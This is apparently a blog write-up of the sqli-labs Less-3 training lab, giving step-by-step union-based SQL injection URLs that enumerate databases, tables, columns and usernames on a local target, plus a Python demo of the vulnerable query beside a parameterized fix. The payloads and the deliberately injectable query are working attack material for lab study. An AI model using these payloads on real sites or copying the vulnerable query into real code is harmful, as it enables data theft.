sqli-labs less 3

One, enter an id; the page displays normally

http://127.0.0.1/sqli-labs-master/Less-3/?id=1

Two, determine whether the parameter is numeric or character type. Both `and 1=1` and `and 1=2` display normally, which indicates the parameter is handled as a string, so this is character-type injection

http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=1
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=2

Three, determine the closing method
1. Try a single quote; it reports an error

http://127.0.0.1/sqli-labs-master/Less-3/?id=1'


2. Try adding a comment character; it still reports an error

http://127.0.0.1/sqli-labs-master/Less-3/?id=1' --+


3. If it still reports an error after adding the comment, try adding a closing parenthesis. If the page displays normally, the closing method is ')

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+

Four, determine the number of fields

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') order by 3 --+

Five, determine the display positions

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+

Six, enumerate all databases

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

Seven, enumerate all tables in the specified database (security)

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+


Eight, enumerate all columns in the specified table (users)

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

Nine, enumerate all data in the specified column (username)

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(username) from users),3 --+

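To show what the closing-method probes in step Three actually exercise, here is an added example (not the sqli-labs code) that reproduces the Less-3 query shape, id=('...'), in Python with SQLite standing in for MySQL, and places the parameterized fix beside it. The users rows are constructed, and MySQL's lenient string-to-number cast (which makes step Two display normally for both probes) is not reproduced by SQLite, so only the quote, comment and parenthesis probes are walked through.

```python
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    # Constructed stand-in for the lab's users table (not the real sqli-labs data).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "pw1"), (2, "bob", "pw2")])
    return con


def vulnerable_lookup(con, raw_id):
    # Same shape as the Less-3 query: the value is wrapped in ('...') and pasted
    # straight into the SQL text. unquote_plus turns the URL's '--+' into '-- ',
    # which is why the trailing '+' is needed for a valid line comment.
    id_value = unquote_plus(raw_id)
    sql = f"SELECT id, username, password FROM users WHERE id=('{id_value}') LIMIT 1"
    return con.execute(sql).fetchall()


def probe(con, raw_id):
    # Mirrors the page's test: does the page render normally or report an error?
    try:
        return "normal" if vulnerable_lookup(con, raw_id) else "empty"
    except sqlite3.OperationalError:
        return "error"


def safe_lookup(con, raw_id):
    # Hardened form: check that id is an integer, then bind it as a parameter so a
    # quote, parenthesis or comment sequence never reaches the SQL parser as syntax.
    id_value = unquote_plus(raw_id)
    if not id_value.isdigit():
        return []
    return con.execute(
        "SELECT id, username, password FROM users WHERE id=? LIMIT 1",
        (int(id_value),),
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    for payload in ["1", "1'", "1' --+", "1') --+"]:
        print(f"{payload!r:14} -> {probe(con, payload)}")
    union = "-1') union select 1,2,3 --+"
    print("vulnerable:", vulnerable_lookup(con, union))  # [(1, 2, 3)]
    print("hardened:  ", safe_lookup(con, union))        # []
```

The probe sequence reproduces the error/error/normal pattern from step Three, and the union row shows why columns 2 and 3 are usable display positions in step Five, while the parameterized query returns nothing for the same input.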
over~

Origin blog.csdn.net/Monster1m/article/details/112061631